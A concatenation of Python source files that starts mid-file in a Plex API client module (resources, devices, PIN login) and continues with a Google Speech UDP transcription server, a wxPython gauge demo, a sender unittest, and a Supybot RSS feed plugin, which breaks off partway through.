self.machineIdentifier = data.attrib.get('machineIdentifier')
self.name = data.attrib.get('name')
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.numLibraries = utils.cast(int, data.attrib.get('numLibraries'))
self.allLibraries = utils.cast(bool, data.attrib.get('allLibraries'))
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.pending = utils.cast(bool, data.attrib.get('pending'))
def section(self, name):
""" Returns the :class:`~plexapi.myplex.Section` that matches the name specified.
Parameters:
name (str): Name of the section to return.
"""
for section in self.sections():
if name.lower() == section.title.lower():
return section
raise NotFound('Unable to find section %s' % name)
def sections(self):
""" Returns a list of all :class:`~plexapi.myplex.Section` objects shared with this user.
"""
url = MyPlexAccount.FRIENDSERVERS.format(machineId=self.machineIdentifier, serverId=self.id)
data = self._server.query(url)
sections = []
for section in data.iter('Section'):
if ElementTree.iselement(section):
sections.append(Section(self, section, url))
return sections
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server.resource(self.name).connect()
return server.history(maxresults=maxresults, mindate=mindate, accountID=self.accountID)
class MyPlexResource(PlexObject):
""" This object represents resources connected to your Plex server that can provide
content such as Plex Media Servers, iPhone or Android clients, etc. The raw xml
for the data presented here can be found at:
https://plex.tv/api/resources?includeHttps=1&includeRelay=1
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
accessToken (str): This resources accesstoken.
clientIdentifier (str): Unique ID for this resource.
connections (list): List of :class:`~myplex.ResourceConnection` objects
for this resource.
createdAt (datetime): Timestamp this resource first connected to your server.
device (str): Best guess on the type of device this is (PS, iPhone, Linux, etc).
home (bool): Unknown
lastSeenAt (datetime): Timestamp this resource last connected.
name (str): Descriptive name of this resource.
owned (bool): True if this resource is one of your own (you logged into it).
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
presence (bool): True if the resource is online
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (str): Version of the product.
provides (str): List of services this resource provides (client, server,
player, pubsub-player, etc.)
synced (bool): Unknown (possibly True if the resource has synced content?)
"""
TAG = 'Device'
key = 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.accessToken = logfilter.add_secret(data.attrib.get('accessToken'))
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.provides = data.attrib.get('provides')
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.synced = utils.cast(bool, data.attrib.get('synced'))
self.presence = utils.cast(bool, data.attrib.get('presence'))
self.connections = self.findItems(data, ResourceConnection)
self.publicAddressMatches = utils.cast(bool, data.attrib.get('publicAddressMatches'))
# This seems to only be available if its not your device (say are shared server)
self.httpsRequired = utils.cast(bool, data.attrib.get('httpsRequired'))
self.ownerid = utils.cast(int, data.attrib.get('ownerId', 0))
self.sourceTitle = data.attrib.get('sourceTitle') # owners plex username.
def connect(self, ssl=None, timeout=None):
""" Returns a new :class:`~server.PlexServer` or :class:`~client.PlexClient` object.
Often times there is more than one address specified for a server or client.
This function will prioritize local connections before remote and HTTPS before HTTP.
After trying to connect to all available addresses for this resource and
assuming at least one connection was successful, the PlexServer object is built and returned.
Parameters:
ssl (optional): Set True to only connect to HTTPS connections. Set False to
only connect to HTTP connections. Set None (default) to connect to any
HTTP or HTTPS connection.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this resource.
"""
# Sort connections from (https, local) to (http, remote)
# Only check non-local connections unless we own the resource
connections = sorted(self.connections, key=lambda c: c.local, reverse=True)
owned_or_unowned_non_local = lambda x: self.owned or (not self.owned and not x.local)
https = [c.uri for c in connections if owned_or_unowned_non_local(c)]
http = [c.httpuri for c in connections if owned_or_unowned_non_local(c)]
cls = PlexServer if 'server' in self.provides else PlexClient
# Force ssl, no ssl, or any (default)
if ssl is True: connections = https
elif ssl is False: connections = http
else: connections = https + http
# Try connecting to all known resource connections in parellel, but
# only return the first server (in order) that provides a response.
listargs = [[cls, url, self.accessToken, timeout] for url in connections]
log.info('Testing %s resource connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Resource', self.name, results)
class ResourceConnection(PlexObject):
""" Represents a Resource Connection object found within the
:class:`~myplex.MyPlexResource` objects.
Attributes:
TAG (str): 'Connection'
address (str): Local IP address
httpuri (str): Full local address
local (bool): True if local
port (int): 32400
protocol (str): HTTP or HTTPS
uri (str): External address
"""
TAG = 'Connection'
def _loadData(self, data):
self._data = data
self.protocol = data.attrib.get('protocol')
self.address = data.attrib.get('address')
self.port = utils.cast(int, data.attrib.get('port'))
self.uri = data.attrib.get('uri')
self.local = utils.cast(bool, data.attrib.get('local'))
self.httpuri = 'http://%s:%s' % (self.address, self.port)
self.relay = utils.cast(bool, data.attrib.get('relay'))
class MyPlexDevice(PlexObject):
""" This object represents resources connected to your Plex server that provide
playback ability from your Plex Server, iPhone or Android clients, Plex Web,
this API, etc. The raw xml for the data presented here can be found at:
https://plex.tv/devices.xml
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/devices.xml'
clientIdentifier (str): Unique ID for this resource.
connections (list): List of connection URIs for the device.
device (str): Best guess on the type of device this is (Linux, iPad, AFTB, etc).
id (str): MyPlex ID of the device.
model (str): Model of the device (bueller, Linux, x86_64, etc.)
name (str): Hostname of the device.
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (string): Version of the product.
provides (str): List of services this resource provides (client, controller,
sync-target, player, pubsub-player).
publicAddress (str): Public IP address.
screenDensity (str): Unknown
screenResolution (str): Screen resolution (750x1334, 1242x2208, etc.)
token (str): Plex authentication token for the device.
vendor (str): Device vendor (ubuntu, etc).
version (str): Unknown (1, 2, 1.3.3.3148-b38628e, 1.3.15, etc.)
"""
TAG = 'Device'
key = 'https://plex.tv/devices.xml'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.publicAddress = data.attrib.get('publicAddress')
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.model = data.attrib.get('model')
self.vendor = data.attrib.get('vendor')
self.provides = data.attrib.get('provides')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.version = data.attrib.get('version')
self.id = data.attrib.get('id')
self.token = logfilter.add_secret(data.attrib.get('token'))
self.screenResolution = data.attrib.get('screenResolution')
self.screenDensity = data.attrib.get('screenDensity')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.connections = [connection.attrib.get('uri') for connection in data.iter('Connection')]
def connect(self, timeout=None):
""" Returns a new :class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
Sometimes there is more than one address specified for a server or client.
After trying to connect to all available addresses for this client and assuming
at least one connection was successful, the PlexClient object is built and returned.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this device.
"""
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.token, timeout] for url in self.connections]
log.info('Testing %s device connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Device', self.name, results)
def delete(self):
""" Remove this device from your account. """
key = 'https://plex.tv/devices/%s.xml' % self.id
self._server.query(key, self._server._session.delete)
def syncItems(self):
""" Returns an instance of :class:`plexapi.sync.SyncList` for current device.
Raises:
:class:`plexapi.exceptions.BadRequest`: when the device doesn`t provides `sync-target`.
"""
if 'sync-target' not in self.provides:
raise BadRequest('Requested syncList for device which do not provides sync-target')
return self._server.syncItems(client=self)
class MyPlexPinLogin(object):
"""
MyPlex PIN login class which supports getting the four character PIN which the user must
enter on https://plex.tv/link to authenticate the client and provide an access token to
create a :class:`~plexapi.myplex.MyPlexAccount` instance.
This helper class supports a polling, threaded and callback approach.
- The polling approach expects the developer to periodically check if the PIN login was
successful using :func:`plexapi.myplex.MyPlexPinLogin.checkLogin`.
- The threaded approach expects the developer to call
:func:`plexapi.myplex.MyPlexPinLogin.run` and then at a later time call
:func:`plexapi.myplex.MyPlexPinLogin.waitForLogin` to wait for and check the result.
- The callback approach is an extension of the threaded approach and expects the developer
to pass the `callback` parameter to the call to :func:`plexapi.myplex.MyPlexPinLogin.run`.
The callback will be called when the thread waiting for the PIN login to succeed either
finishes or expires. The parameter passed to the callback is the received authentication
token or `None` if the login expired.
Parameters:
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
requestTimeout (int): timeout in seconds on initial connect to plex.tv (default config.TIMEOUT).
Attributes:
PINS (str): 'https://plex.tv/pins.xml'
CHECKPINS (str): 'https://plex.tv/pins/{pinid}.xml'
POLLINTERVAL (int): 1
finished (bool): Whether the pin login has finished or not.
expired (bool): Whether the pin login has expired or not.
token (str): Token retrieved through the pin login.
pin (str): Pin to use for the login on https://plex.tv/link.
"""
PINS = 'https://plex.tv/pins.xml' # get
CHECKPINS = 'https://plex.tv/pins/{pinid}.xml' # get
POLLINTERVAL = 1
def __init__(self, session=None, requestTimeout=None):
super(MyPlexPinLogin, self).__init__()
self._session = session or requests.Session()
self._requestTimeout = requestTimeout or TIMEOUT
self._loginTimeout = None
self._callback = None
self._thread = None
self._abort = False
self._id = None
self.finished = False
self.expired = False
self.token = None
self.pin = self._getPin()
def run(self, callback=None, timeout=None):
""" Starts the thread which monitors the PIN login state.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Raises:
:class:`RuntimeError`: if the thread is already running.
:class:`RuntimeError`: if the PIN login for the current PIN has expired.
"""
if self._thread and not self._abort:
raise RuntimeError('MyPlexPinLogin thread is already running')
if self.expired:
raise RuntimeError('MyPlexPinLogin has expired')
self._loginTimeout = timeout
self._callback = callback
self._abort = False
self.finished = False
self._thread = threading.Thread(target=self._pollLogin, name='plexapi.myplex.MyPlexPinLogin')
self._thread.start()
def waitForLogin(self):
""" Waits for the PIN login to succeed or expire.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Returns:
`True` if the PIN login succeeded or `False` otherwise.
"""
if not self._thread or self._abort:
return False
self._thread.join()
if self.expired or not self.token:
return False
return True
def stop(self):
""" Stops the thread monitoring the PIN login state. """
if not self._thread or self._abort:
return
self._abort = True
self._thread.join()
def checkLogin(self):
""" Returns `True` if the PIN login has succeeded. """
if self._thread:
return False
try:
return self._checkLogin()
except Exception:
self.expired = True
self.finished = True
return False
def _getPin(self):
if self.pin:
return self.pin
url = self.PINS
response = self._query(url, self._session.post)
if not response:
return None
self._id = response.find('id').text
self.pin = response.find('code').text
return self.pin
def _checkLogin(self):
if not self._id:
return False
if self.token:
return True
url = self.CHECKPINS.format(pinid=self._id)
response = self._query(url)
if not response:
return False
token = response.find('auth_token').text
if not token:
return False
self.token = token
self.finished = True
return True
def _pollLogin(self):
try:
start = time.time()
while not self._abort and (not self._loginTimeout or (time.time() - start) < self._loginTimeout):
try:
result = self._checkLogin()
except Exception:
self.expired = True
break
if result:
break
time.sleep(self.POLLINTERVAL)
if self.token and self._callback:
self._callback(self.token)
finally:
self.finished = True
def _query(self, url, method=None):
method = method or self._session.get
log.debug('%s %s', method.__name__.upper(), url)
headers = BASE_HEADERS.copy()
response = method(url, headers=headers, timeout=self._requestTimeout)
if not response.ok: # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def _connect(cls, url, token, timeout, results, i, job_is_done_event=None):
""" Connects to the specified cls with url and token. Stores the connection
information to results[i] in a threadsafe way.
Arguments:
cls: the class which is responsible for establishing connection, basically it's
:class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
url (str): url which should be passed as `baseurl` argument to cls.__init__()
token (str): authentication token which should be passed as `baseurl` argument to cls.__init__()
timeout (int): timeout which should be passed as `baseurl` argument to cls.__init__()
results (list): pre-filled list for results
i (int): index of current job, should be less than len(results)
job_is_done_event (:class:`~threading.Event`): is X_PLEX_ENABLE_FAST_CONNECT is True then the
event would be set as soon the connection is established
"""
starttime = time.time()
try:
device = cls(baseurl=url, token=token, timeout=timeout)
runtime = int(time.time() - starttime)
results[i] = (url, token, device, runtime)
if X_PLEX_ENABLE_FAST_CONNECT and job_is_done_event:
job_is_done_event.set()
except Exception as err:
runtime = int(time.time() - starttime)
log.error('%s: %s', url, err)
results[i] = (url, token, None, runtime)
def _chooseConnection(ctype, name, results):
""" Chooses the first (best) connection from the given _connect results. """
# At this point we have a list of result tuples containing (url, token, PlexServer, runtime)
# or (url, token, None, runtime) in the case a connection could not be established.
for url, token, result, runtime in results:
okerr = 'OK' if result else 'ERR'
log.info('%s connection %s (%ss): %s?X-Plex-Token=%s', ctype, okerr, runtime, url, token)
results = [r[2] for r in results if r and r[2] is not None]
if results:
log.info('Connecting to %s: %s?X-Plex-Token=%s', ctype, results[0]._baseurl, results[0]._token)
return results[0]
raise NotFound('Unable to connect to %s: %s' % (ctype.lower(), name))
|
thread_asyncio_server.py
|
import asyncio
import zlib
import queue
import threading
import audioop
from google.cloud import speech
from config.config import Config
from config.config import Server
buffer = queue.Queue()
buffer_response = queue.Queue()
def chunks():
while True:
try:
yield buffer.get(timeout = 1)
except queue.Empty:
break
def get_transcription():
while True:
generator = chunks()
client = speech.SpeechClient()
config = speech.types.RecognitionConfig(
encoding=Config.encoding,
language_code=Config.language,
sample_rate_hertz=Config.rate
)
config = speech.types.StreamingRecognitionConfig(config=config, interim_results = True)
requests = (speech.types.StreamingRecognizeRequest(audio_content=chunk) for chunk in generator)
results = client.streaming_recognize(config, requests)
for result in results:
print(result)
for data in result.results:
for parts in data.alternatives:
buffer_response.put(parts.transcript)
def activate_job():
background = threading.Thread(target=get_transcription, args=())
background.daemon = True
background.start()
class EchoServerProtocol(asyncio.DatagramProtocol):
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
message = audioop.adpcm2lin(zlib.decompress(data), 2, None)
buffer.put(message[0])
if buffer_response.empty():
self.transport.sendto(b'', addr)
else:
self.transport.sendto(buffer_response.get().encode(), addr)
def run_server():
loop = asyncio.get_event_loop()
listen = loop.create_datagram_endpoint(
EchoServerProtocol, local_addr=(Server.host, Server.port))
transport, protocol = loop.run_until_complete(listen)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
transport.close()
loop.close()
if __name__ == '__main__':
activate_job()
run_server()
|
guagetest.py
|
import wx
import time
import threading
class Mywin(wx.Frame):
def __init__(self, parent, title):
super(Mywin, self).__init__(parent, title=title, size=(300, 200))
self.InitUI()
def InitUI(self):
self.thread = threading.Thread(target=self.targetThread)
self.thread.setDaemon(True)
self.count = 0
pnl = wx.Panel(self)
vbox = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
self.gauge = wx.Gauge(pnl, range=20, size=(250, 25), style=wx.GA_HORIZONTAL)
self.btn1 = wx.Button(pnl, label="Start")
self.Bind(wx.EVT_BUTTON, self.OnStart, self.btn1)
hbox1.Add(self.gauge, proportion=1, flag=wx.ALIGN_CENTRE)
hbox2.Add(self.btn1, proportion=1, flag=wx.RIGHT, border=10)
vbox.Add((0, 30))
vbox.Add(hbox1, flag=wx.ALIGN_CENTRE)
vbox.Add((0, 20))
vbox.Add(hbox2, proportion=1, flag=wx.ALIGN_CENTRE)
pnl.SetSizer(vbox)
self.SetSize((300, 200))
self.Centre()
self.Show(True)
def ChangeGauge(self):
self.count = self.count + 1
self.gauge.SetValue(self.count)
def targetThread(self):
while True:
time.sleep(1);
wx.CallAfter(self.ChangeGauge)
if self.count >= 20:
print "end"
return
def OnStart(self, e):
self.thread.start()
ex = wx.App()
Mywin(None, 'wx.Gauge - www.yiibai.com')
ex.MainLoop()
|
test_sender.py
|
#!/usr/bin/env python
import unittest
import logging
from mock import MagicMock
from multiprocessing import Process, Queue
import os
import random
import sys
import time
sys.path.insert(0, os.path.abspath('..'))
from context import Context
from sender import Sender
class SenderTests(unittest.TestCase):
def test_stop(self):
logging.debug('*** Stop test ***')
mouth = Queue()
context = Context()
sender = Sender(mouth)
sender_process = Process(target=sender.work, args=(context,))
sender_process.daemon = True
sender_process.start()
sender_process.join(1.0)
if sender_process.is_alive():
logging.debug('Stopping sender')
context.set('general.switch', 'off')
sender_process.join()
self.assertFalse(sender_process.is_alive())
self.assertEqual(context.get('sender.counter', 0), 0)
def test_processing(self):
logging.debug('*** Processing test ***')
mouth = Queue()
mouth.put('hello')
mouth.put('world')
mouth.put(Exception('EOQ'))
context = Context()
context.set('spark.CISCO_SPARK_PLUMBERY_BOT', 'garbage')
context.set('spark.room_id', 'fake')
sender = Sender(mouth)
# sender.post_update = MagicMock()
sender.work(context)
with self.assertRaises(Exception):
mouth.get_nowait()
if __name__ == '__main__':
logging.getLogger('').setLevel(logging.DEBUG)
sys.exit(unittest.main())
|
plugin.py
|
###
# Copyright (c) 2002-2004, Jeremiah Fincher
# Copyright (c) 2008-2010, James McCoy
# Copyright (c) 2014, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import os
import sys
import json
import time
import types
import string
import socket
import threading
import feedparser
import supybot.conf as conf
import supybot.utils as utils
import supybot.world as world
from supybot.commands import *
import supybot.utils.minisix as minisix
import supybot.ircmsgs as ircmsgs
import supybot.ircutils as ircutils
import supybot.registry as registry
import supybot.callbacks as callbacks
from supybot.i18n import PluginInternationalization, internationalizeDocstring
_ = PluginInternationalization('RSS')
if world.testing:
INIT_DELAY = 1
else:
INIT_DELAY = 10
if minisix.PY2:
from urllib2 import ProxyHandler
else:
from urllib.request import ProxyHandler
def get_feedName(irc, msg, args, state):
if ircutils.isChannel(args[0]):
state.errorInvalid('feed name', args[0], 'must not be channel names.')
if not registry.isValidRegistryName(args[0]):
state.errorInvalid('feed name', args[0],
'Feed names must not include spaces.')
state.args.append(callbacks.canonicalName(args.pop(0)))
addConverter('feedName', get_feedName)
announced_headlines_filename = \
conf.supybot.directories.data.dirize('RSS_announced.flat')
def only_one_at_once(f):
lock = [False]
def newf(*args, **kwargs):
if lock[0]:
return
lock[0] = True
try:
f(*args, **kwargs)
finally:
lock[0] = False
return newf
class InvalidFeedUrl(ValueError):
pass
class Feed:
__slots__ = ('url', 'name', 'data', 'last_update', 'entries',
'etag', 'modified', 'initial',
'lock', 'announced_entries')
def __init__(self, name, url, initial,
plugin_is_loading=False, announced=None):
assert name, name
if not url:
if not utils.web.httpUrlRe.match(name):
raise InvalidFeedUrl(name)
url = name
self.name = name
self.url = url
self.initial = initial
self.data = None
# We don't want to fetch feeds right after the plugin is
# loaded (the bot could be starting, and thus already busy)
self.last_update = 0
self.entries = []
self.etag = None
self.modified = None
self.lock = threading.Lock()
self.announced_entries = announced or \
utils.structures.TruncatableSet()
def __repr__(self):
return 'Feed(%r, %r, %b, <bool>, %r)' % \
(self.name, self.url, self.initial, self.announced_entries)
def get_command(self, plugin):
docstring = format(_("""[<number of headlines>]
Reports the titles for %s at the RSS feed %u. If
<number of headlines> is given, returns only that many headlines.
RSS feeds are only looked up every supybot.plugins.RSS.waitPeriod
seconds, which defaults to 1800 (30 minutes) since that's what most
websites prefer."""), self.name, self.url)
def f(self2, irc, msg, args):
args.insert(0, self.name)
self2.rss(irc, msg, args)
f = utils.python.changeFunctionName(f, self.name, docstring)
f = types.MethodType(f, plugin)
return f
_sort_parameters = {
'oldestFirst': (('published_parsed', 'updated_parsed'), False),
'newestFirst': (('published_parsed', 'updated_parsed'), True),
'outdatedFirst': (('updated_parsed', 'published_parsed'), False),
'updatedFirst': (('updated_parsed', 'published_parsed'), True),
}
def _sort_arguments(order):
(fields, reverse) = _sort_parameters[order]
def key(entry):
for field in fields:
if field in entry:
return entry[field]
raise KeyError('No date field in entry.')
return (key, reverse)
def sort_feed_items(items, order):
"""Return feed items, sorted according to sortFeedItems."""
if order == 'asInFeed':
return items
(key, reverse) = _sort_arguments(order)
try:
sitems = sorted(items, key=key, reverse=reverse)
except KeyError:
# feedparser normalizes required timestamp fields in ATOM and RSS
# to the "published"/"updated" fields. Feeds missing it are unsortable by date.
return items
return sitems
def load_announces_db(fd):
return dict((name, utils.structures.TruncatableSet(entries))
for (name, entries) in json.load(fd).items())
def save_announces_db(db, fd):
json.dump(dict((name, list(entries)) for (name, entries) in db), fd)
class RSS(callbacks.Plugin):
"""This plugin is useful both for announcing updates to RSS feeds in a
channel, and for retrieving the headlines of RSS feeds via command. Use
the "add" command to add feeds to this plugin, and use the "announce"
command to determine what feeds should be announced in a given channel."""
threaded = True
def __init__(self, irc):
self.__parent = super(RSS, self)
self.__parent.__init__(irc)
if world.starting:
self._init_time = time.time() # To delay loading the feeds
else:
self._init_time = 0
# Scheme: {name: url}
self.feed_names = callbacks.CanonicalNameDict()
# Scheme: {url: feed}
self.feeds = {}
if os.path.isfile(announced_headlines_filename):
with open(announced_headlines_filename) as fd:
announced = load_announces_db(fd)
else:
announced = {}
for name in self.registryValue('feeds'):
self.assert_feed_does_not_exist(name)
self.register_feed_config(name)
try:
url = self.registryValue(registry.join(['feeds', name]))
except registry.NonExistentRegistryEntry:
self.log.warning('%s is not a registered feed, removing.',name)
continue
try:
self.register_feed(name, url, True, True, announced.get(name, []))
except InvalidFeedUrl:
self.log.error('%s is not a valid feed, removing.', name)
continue
world.flushers.append(self._flush)
def die(self):
self._flush()
world.flushers.remove(self._flush)
self.__parent.die()
def _flush(self):
l = [(f.name, f.announced_entries) for f in self.feeds.values()]
with utils.file.AtomicFile(announced_headlines_filename, 'w',
backupDir='/dev/null') as fd:
save_announces_db(l, fd)
##################
# Feed registering
def assert_feed_does_not_exist(self, name, url=None):
if self.isCommandMethod(name):
s = format(_('I already have a command in this plugin named %s.'),
name)
raise callbacks.Error(s)
if url:
feed = self.feeds.get(url)
if feed and feed.name != feed.url:
s = format(_('I already have a feed with that URL named %s.'),
feed.name)
raise callbacks.Error(s)
def register_feed_config(self, name, url=''):
self.registryValue('feeds').add(name)
group = self.registryValue('feeds', value=False)
conf.registerGlobalValue(group, name,
registry.String(url, """The URL for the feed
%s. Note that because
announced lines are cached,
you may need to reload this
plugin after changing this
option.""" % name))
feed_group = conf.registerGroup(group, name)
conf.registerChannelValue(feed_group, 'format',
registry.String('', _("""Feed-specific format. Defaults to
supybot.plugins.RSS.format if empty.""")))
conf.registerChannelValue(feed_group, 'announceFormat',
registry.String('', _("""Feed-specific announce format.
Defaults to supybot.plugins.RSS.announceFormat if empty.""")))
conf.registerGlobalValue(feed_group, 'waitPeriod',
registry.NonNegativeInteger(0, _("""If set to a non-zero
value, overrides supybot.plugins.RSS.waitPeriod for this
particular feed.""")))
def register_feed(self, name, url, initial,
plugin_is_loading, announced=None):
self.feed_names[name] = url
self.feeds[url] = Feed(name, url, initial,
plugin_is_loading, announced)
def remove_feed(self, feed):
del self.feed_names[feed.name]
del self.feeds[feed.url]
conf.supybot.plugins.RSS.feeds().remove(feed.name)
conf.supybot.plugins.RSS.feeds.unregister(feed.name)
##################
# Methods handling
def isCommandMethod(self, name):
if not self.__parent.isCommandMethod(name):
return bool(self.get_feed(name))
else:
return True
def listCommands(self):
return self.__parent.listCommands(self.feed_names.keys())
def getCommandMethod(self, command):
try:
return self.__parent.getCommandMethod(command)
except AttributeError:
return self.get_feed(command[0]).get_command(self)
def __call__(self, irc, msg):
self.__parent.__call__(irc, msg)
threading.Thread(target=self.update_feeds).start()
##################
# Status accessors
def get_feed(self, name):
return self.feeds.get(self.feed_names.get(name, name), None)
def is_expired(self, feed):
assert feed
period = self.registryValue('waitPeriod')
if feed.name != feed.url: # Named feed
specific_period = self.registryValue('feeds.%s.waitPeriod' % feed.name)
if specific_period:
period = specific_period
event_horizon = time.time() - period
return feed.last_update < event_horizon
###############
# Feed fetching
def update_feed(self, feed):
handlers = []
if utils.web.proxy():
handlers.append(ProxyHandler(
{'http': utils.force(utils.web.proxy())}))
handlers.append(ProxyHandler(
{'https': utils.force(utils.web.proxy())}))
with feed.lock:
d = feedparser.parse(feed.url, etag=feed.etag,
modified=feed.modified, handlers=handlers)
if 'status' not in d or d.status != 304: # Not modified
if 'etag' in d:
feed.etag = d.etag
if 'modified' in d:
feed.modified = d.modified
feed.data = d.feed
feed.entries = d.entries
if feed.name == "edgalnet":
self.log.debug("RSS: updated_feed '%s' - producing galnet links from IDs" % (feed.name))
for e in feed.entries:
e['link'] = re.sub('/en/', '/en/galnet/uid/', e.get('id'))
feed.last_update = time.time()
(initial, feed.initial) = (feed.initial, False)
self.announce_feed(feed, initial)
def update_feed_if_needed(self, feed):
if self.is_expired(feed) and \
self._init_time + INIT_DELAY < time.time():
self.update_feed(feed)
@only_one_at_once
def update_feeds(self):
announced_feeds = set()
for irc in world.ircs:
for channel in irc.state.channels:
announced_feeds |= self.registryValue('announce', channel)
for name in announced_feeds:
feed = self.get_feed(name)
if not feed:
self.log.warning('Feed %s is announced but does not exist.',
name)
continue
self.update_feed_if_needed(feed)
def get_new_entries(self, feed):
# http://validator.w3.org/feed/docs/rss2.html#hrelementsOfLtitemgt
get_id = lambda entry: entry.id if hasattr(entry, 'id') else (
entry.title if hasattr(entry, 'title') else entry.description)
with feed.lock:
entries = feed.entries
new_entries = [entry for entry in entries
if get_id(entry) not in feed.announced_entries]
if not new_entries:
return []
feed.announced_entries |= set(get_id(entry) for entry in new_entries)
# We keep a little more because we don't want to re-announce
# oldest entries if one of the newest gets removed.
feed.announced_entries.truncate(10*len(entries))
return new_entries
def announce_feed(self, feed, initial):
new_entries = self.get_new_entries(feed)
order = self.registryValue('sortFeedItems')
new_entries = sort_feed_items(new_entries, 'newestFirst')
for irc in world.ircs:
for channel in irc.state.channels:
if feed.name not in self.registryValue('announce', channel):
continue
if initial:
max_entries = \
self.registryValue('initialAnnounceHeadlines', channel)
else:
max_entries = \
self.registryValue('maximumAnnounceHeadlines', channel)
announced_entries = new_entries[0:max_entries]
announced_entries = sort_feed_items(announced_entries, order)
for entry in announced_entries:
self.announce_entry(irc, channel, feed, entry)
#################
# Entry rendering
def should_send_entry(self, channel, entry):
whitelist = self.registryValue('keywordWhitelist', channel)
blacklist = self.registryValue('keywordBlacklist', channel)
# fix shadowing by "from supybot.commands import *"
try:
all = __builtins__.all
any = __builtins__.any
except AttributeError:
all = __builtins__['all']
any = __builtins__['any']
title = getattr(entry, 'title', '')
description = getattr(entry, 'description', '')
if whitelist:
if all(kw not in title and kw not in description
for kw in whitelist):
return False
if blacklist:
if any(kw in title or kw in description
for kw in blacklist):
return False
return True
_normalize_entry = utils.str.multipleReplacer(
{'\r': ' ', '\n': ' ', '\x00': ''})
def format_entry(self, channel, feed, entry, is_announce):
key_name = 'announceFormat' if is_announce else 'format'
if feed.name in self.registryValue('feeds'):
specific_key_name = registry.join(['feeds', feed.name, key_name])
template = self.registryValue(specific_key_name, channel) or \
self.registryValue(key_name, channel)
else:
template = self.registryValue(key_name, channel)
date = entry.get('published_parsed')
date = utils.str.timestamp(date)
s = string.Template(template).substitute(
entry,
feed_name=feed.name,
date=date)
return self._normalize_entry(s)
def announce_entry(self, irc, channel, feed, entry):
if self.should_send_entry(channel, entry):
s = self.format_entry(channel, feed, entry, True)
if self.registryValue('notice', channel):
m = ircmsgs.notice(channel, s)
else:
m = ircmsgs.privmsg(channel, s)
irc.queueMsg(m)
##########
# Commands
@internationalizeDocstring
def add(self, irc, msg, args, name, url):
